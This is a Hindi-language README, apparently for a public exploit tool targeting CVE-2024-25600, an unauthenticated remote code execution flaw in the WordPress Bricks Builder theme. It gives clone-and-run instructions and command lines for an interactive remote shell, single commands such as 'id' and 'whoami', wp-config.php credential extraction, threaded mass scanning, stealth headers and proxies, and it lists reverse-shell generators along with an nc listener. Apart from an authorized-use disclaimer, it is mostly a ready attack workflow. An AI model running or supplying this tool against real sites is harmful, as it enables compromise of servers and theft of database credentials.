
CVE-2024-25600 - WordPress Bricks Builder थीम के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट। उन्नत शोषण ढांचा जिसमें इंटरैक्टिव शेल, रिवर्स शेल, फ़ाइल अपलोड/डाउनलोड, एसिंक्रोनस स्कैनिंग, स्टील्थ मोड, प्रॉक्सी समर्थन, और मल्टी-थ्रेडेड भेद्यता स्कैनिंग शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए।
CVE-2024-25600 के लिए अधिकृत सुरक्षा मूल्यांकन उपकरण
लेखक: सुदीपा वानिगरथना · उपकरण: BricksRCE एक्सप्लॉइटर v1.0
मुख्य स्क्रिप्ट: cve-2024-25600.py
[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक दुरुपयोग से उत्पन्न किसी भी देयता को स्वीकार नहीं करता है।
CVE-2024-25600 WordPress Bricks Builder थीम में एक गंभीर, अनप्रमाणित दूरस्थ कोड निष्पादन कमजोरी है। render_element REST एंडपॉइंट में उपयोगकर्ता-नियंत्रित इनपुट के अनुचित हैंडलिंग के कारण, अनप्रमाणित हमलावर प्रभावित इंस्टॉलेशन पर मनमाना PHP/सिस्टम कमांड निष्पादित कर सकते हैं।
BricksRCE एक्सप्लॉइटर (cve-2024-25600.py) अधिकृत सुरक्षा पेशेवरों के लिए एक पूर्ण-विशेषताओं वाला Python मूल्यांकन उपकरण है, जो:
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2024-25600 |
| CVSS | 9.8 (गंभीर) |
| हमला वेक्टर | नेटवर्क — अनप्रमाणित |
| प्रभाव | पूर्ण दूरस्थ कोड निष्पादन, गोपनीयता / अखंडता / उपलब्धता से समझौता |
| प्रभावित उत्पाद | WordPress Bricks Builder थीम |
| प्रभावित संस्करण | Bricks ≤ 1.9.6 (1.9.6.1+ में पैच किया गया) |
| कमजोरी प्रकार | अनप्रमाणित दूरस्थ कोड निष्पादन |
| CWE | CWE-94 (कोड उत्पादन का अनुचित नियंत्रण) |
| एंडपॉइंट | विधि |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element अनुरोध सबमिट करें| क्षमता | विवरण |
|---|---|
| कमजोरी का पता लगाना | नियंत्रित मार्कर-आधारित जांच के माध्यम से RCE की पुष्टि |
| Nonce निष्कर्षण | बहु-विधि nonce खोज (स्क्रिप्ट, पेज स्रोत, मेटा, REST) |
| संस्करण का पता लगाना | CSS / readme / REST से Bricks Builder संस्करण की पहचान |
| इंटरैक्टिव शेल | इतिहास, ऑटोकम्प्लीट और फ़ाइल स्थानांतरण के साथ पूर्ण REPL |
| एकल-कमांड मोड | एक कमांड निष्पादित करें और बाहर निकलें (स्क्रिप्टिंग के अनुकूल) |
| रिवर्स शेल सहायक | bash / nc / Python / PHP / Perl / Ruby रिवर्स शेल उत्पन्न करें |
| wp-config निष्कर्षण | wp-config.php का पता लगाने और पढ़ने का प्रयास |
| बड़े पैमाने पर स्कैनिंग | URL सूची से एसिंक या थ्रेडेड बहु-लक्ष्य स्कैनिंग |
| क्षमता | विवरण |
|---|---|
| दर सीमित करना | अनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब |
| पुनर्प्रयास तर्क | टाइमआउट और कनेक्शन त्रुटियों पर एक्सपोनेंशियल बैकऑफ़ |
| User-Agent रोटेशन | प्रति अनुरोध यादृच्छिक ब्राउज़र फ़िंगरप्रिंट |
| स्टील्थ मोड | यादृच्छिक Accept-Language / Accept-Encoding हेडर |
| प्रॉक्सी समर्थन | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| दोहरे एंडपॉइंट | wp-json, rest_route, या दोनों को प्राथमिकता दें |
| फ़ोर्स मोड | प्री-चेक छोड़ें और सीधे शोषण का प्रयास करें |
| समृद्ध CLI | Rich के माध्यम से प्रोग्रेस बार, टेबल और रंगीन पैनल |
| क्षमता | विवरण |
|---|---|
| JSON / TXT निर्यात | स्कैन परिणाम और कमजोर लक्ष्य सहेजें |
| कमांड इतिहास | निष्पादित कमांड का वैकल्पिक लॉगिंग |
| फ़ाइल लॉगिंग | स्थायी bricks_rce.log और कस्टम लॉग पथ |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # वैकल्पिक — SOCKS5 प्रॉक्सी समर्थन
https://target.exampleको केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।
# इंटरैक्टिव शेल
python3 cve-2024-25600.py -u https://target.example
# एकल कमांड
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# बड़े पैमाने पर स्कैन
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# संस्करण पता लगाना
python3 cve-2024-25600.py -u https://target.example --detect-version
# Burp प्रॉक्सी के माध्यम से
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
सभी उदाहरण मुख्य स्क्रिप्ट
cve-2024-25600.pyका उपयोग करते हैं
python3 cve-2024-25600.py --help
लक्ष्य के कमजोर होने की पुष्टि के बाद एक इंटरैक्टिव RCE शेल खोलता है।
python3 cve-2024-25600.py -u https://target.example
कार्यप्रवाह:
--force न हो)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
कमांड आउटपुट को फ़ाइल में सहेजें:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
# डिफ़ॉल्ट PHP अपवाद-आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# system() आधारित पेलोड
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
python3 cve-2024-25600.py -u https://target.example --detect-version
कमांड के साथ संयोजित करें:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
सफलता पर wp-config_<target>.txt के रूप में सहेजा जाता है।
# टर्मिनल 1 — श्रोता
nc -lvnp 4444